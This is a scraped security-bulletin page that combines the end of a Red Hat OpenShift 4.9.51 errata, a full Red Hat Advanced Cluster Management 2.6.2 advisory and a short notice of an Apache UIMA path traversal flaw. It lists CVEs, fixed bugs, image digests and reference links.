https://access.redhat.com/errata/RHBA-2022:7215

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Security Fix(es):

* go-getter: command injection vulnerability (CVE-2022-26945)  
* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)  
* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)  
* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

You may download the oc tool and use it to inspect release image metadata  
as follows:

(For x86_64 architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-x86_64

The image digest is  
sha256:ffbbbac3b3f719d993c0afd199c95efea7071817ddb1b744f817247efe4e7486

(For s390x architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-s390x

The image digest is  
sha256:5aed1dd6a7f96acd437bcc1c8d40ae23125dc07d2358ea354783d65d6008846d

(For ppc64le architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-ppc64le

The image digest is  
sha256:32bdc794a83bc6a81412b4f0908f5830e2a02e5c8730808c848328d0335fbc92

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)  
2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)  
2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)  
2092928 - CVE-2022-26945 go-getter: command injection vulnerability  
2095112 - [ovn] northd container termination script must use bash  
2096792 - machine-config-daemon-pull.service: use `cp` instead of `cat` when extracting MCD in OKD

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-1469 - [4.9] Memory leak CRIO due to no garbage collection in /run/crio/exits for exited containers  
OCPBUGS-2101 - [4.11] .dockerignore interferes with OSBS2 builds  
OCPBUGS-2120 - [4.11] ETCD Operator goes degraded when a second internal node ip is added  
OCPBUGS-2143 - [4.9] Rebase openshift/etcd 4.9 onto 3.5.5  
OCPBUGS-2204 - Prefer local dns does not work expectedly on OCPv4.9  
OCPBUGS-2261 - Rotated logs should be collected by must-gather for 4.9 clusters  
OCPBUGS-2465 - [4.9] cri-o should report the stage of container and pod creation it's stuck at  
OCPBUGS-2576 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name

6. References:

https://access.redhat.com/security/cve/CVE-2021-45485  
https://access.redhat.com/security/cve/CVE-2021-45486  
https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-21618  
https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/cve/CVE-2022-26945  
https://access.redhat.com/security/cve/CVE-2022-30321  
https://access.redhat.com/security/cve/CVE-2022-30322  
https://access.redhat.com/security/cve/CVE-2022-30323  
https://access.redhat.com/security/cve/CVE-2022-39399  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2O6Q9zjgjWX9erEAQiciQ//Vk2JkvS6D+lA/20F5Pr9WMiihGRI12Tr  
j2YoX40nHqhQ0cZKKXRkRJOYqNy5L6u8Wx5cO4V6NeGnoEGQoa980IW/l/KJptG6  
OSAQXpLRk9ECHf4lH/kvJuf8mgcM+KBspT7MetkkW7shwKfPOyYOU0/Tp8zcp2W+  
xhiFmD+4bfBQPFdlLi2wxFcvbeUKuRrOdPH1pA3DBs8WQiakL9zVAtzZD0jzvuzf  
+TaUhcGDrSa/EAKdUpYGGuh6cUI2ECFTXj8uljrRUJgI3yKGrk7Z3H7zSo3Qmj5w  
jH6bRJwNt/1HXw2QJjUU2REuZSD4xdqd+lCkMb5iB+keiQnTleKxRCNDqI2EjcMw  
Glf6+fvq95keo3iO6v7rSmoZOOdrq4a+uRg3LyWkVPT/BWsmU17yKQa0dKEaDv2r  
ZssQTaxxmNFUZAAfpSORNvu9zrTWAsej1+UE+2S8KMEGpIVoHxba7TtcA+Eva2GT  
+VRTDB9OBDWewYkOJjk8RascgGvKLquZolQI6osg/8/8KoxzkuJmt/6tbwKUVmii  
8kadVJr1A3qPH6D3p3IXuHGpNxeCW9q0SzkwO1kBbm6zoMfcl4ErdUzYS+guSDaC  
yRxoH1ILoz7aifxpBRaOtbxkE/Fzh4Ql5aF4Nq2GiWjyuUCI+sen9fvuZLKgRXQv  
wEasM35nlZY=ITpR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7216-01

Red Hat Security Advisory 2022-7313-01 - Red Hat Advanced Cluster Management for Kubernetes 2.6.2 images Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Issues addressed include denial of service and remote SQL injection vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Advanced Cluster Management 2.6.2 security update and bug fixes  
Advisory ID:       RHSA-2022:7313-01  
Product:           Red Hat ACM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7313  
Issue date:        2022-11-02  
CVE Names:         CVE-2015-20107 CVE-2020-35525 CVE-2020-35527   
                   CVE-2022-0391 CVE-2022-0494 CVE-2022-1353   
                   CVE-2022-2238 CVE-2022-2509 CVE-2022-2588   
                   CVE-2022-3515 CVE-2022-23816 CVE-2022-23825   
                   CVE-2022-25858 CVE-2022-25887 CVE-2022-25896   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-31129   
                   CVE-2022-34903 CVE-2022-37434 CVE-2022-40674   
=====================================================================

1. Summary:

Red Hat Advanced Cluster Management for Kubernetes 2.6.2 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.6.2 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html/release_notes/

Security fixes:

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* passport: incorrect session regeneration (CVE-2022-25896)

* sanitize-html: insecure global regular expression replacement logic may  
lead to ReDoS (CVE-2022-25887)

* terser: insecure use of regular expressions leads to ReDoS  
(CVE-2022-25858)

* search-api: SQL injection leads to remote denial of service  
(CVE-2022-2238)

Bug fixes:

* ACM 2.6.2 images (BZ# 2126195)

* Infra MachineSet Replicate Taint (BZ# 2116528)

* Work agent panic when apply the manifestwork (BZ# 2120920)

* unexpected difference of behavior in inform policies with lists of  
apiGroups for ClusterRole resources (BZ# 2130985)

3. Solution:

For Red Hat Advanced Cluster Management for Kubernetes, see the following  
documentation, which will be updated shortly for this release, for  
important  
instructions on installing this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.6/html-single/install/index#installing

4. Bugs fixed (https://bugzilla.redhat.com/):

2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2111862 - CVE-2022-25896 passport: incorrect session regeneration  
2116528 - Infra MachineSet Replicate Taint  
2120920 - work agent panic when apply the manifestwork  
2123376 - CVE-2022-25887 sanitize-html: insecure global regular expression replacement logic may lead to ReDoS  
2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS  
2130985 - unexpected difference of behaviour in inform policies with lists of apiGroups for ClusterRole ressources

5. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2238  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-25858  
https://access.redhat.com/security/cve/CVE-2022-25887  
https://access.redhat.com/security/cve/CVE-2022-25896  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2K9StzjgjWX9erEAQiBbw/8CKQ3ZcFqNuB4sb/VejlKEzOmNEeEu6yw  
++bW4JaVsfBCQwUZC9YctDPmF3rq6vpASbHTFchJ4jRw8jb2gOimEAbzDOlEJCo9  
t2O6Ud5utnSrzTJXghV5zr0ZEoz2OlLfDyO9pEpeXGtRCP+zJvXNheKiDJU4rt8m  
9zyQAlkUTW+ECY6D5WE5yaizXVatwOOhitwb1URGipCxyxCwvZq9IwHpfZPfvzRD  
pkmJQy/hfKe2jmnfVsGfilltCrnyTZgWmkLRWfWhJUhttMRPmTRsaB4gWcb5QnGJ  
7iPtP9BLq/BPRfajQoOWXUh7F19xUTlrkJkIEdBAqSglE1OQ0YAe/XqUT5YcxCT1  
j9AeUN26MLQnR3lF7n2NN7WCLAiVd90y9uE1T58KGEHJXB5w+Trdae+2u4a5DlXc  
EFVesa8kWsT1zf26+xsVNyfmxHbYgFfaJ34/knllJCAvIZuKUVAdqSuZXGwbQH7o  
Lwcin81O9DWz+My0DUNDH2S5bNziXMB4fir9E2wNHZ7mBYcpB/DbqSxNdS8E3oGg  
GCPgs0kET7gW8A/z4+G1scrTGP5vrm6aaH0y3ilUT844gaeYh5Kb5Qe8kEgeqh4S  
u7IriHK0aMEm7Fw1KzrzELImX6Qti1GqrfbF7RnwMj2JqkOidj7BJ/1wBnTP+K05  
KDH5TbKA8f4=  
=9tk5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7313-01

A relative path traversal vulnerability in a FileUtil class used by the PEAR management component of Apache UIMA allows an attacker to create files outside the designated target directory using carefully crafted ZIP entry names. This issue affects Apache UIMA Apache UIMA version 3.3.0 and prior versions. Note that PEAR files should never be installed into an UIMA installation from untrusted sources because PEAR archives are executable plugins that will be able to perform any actions with the same privileges as the host Java Virtual Machine.

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#mac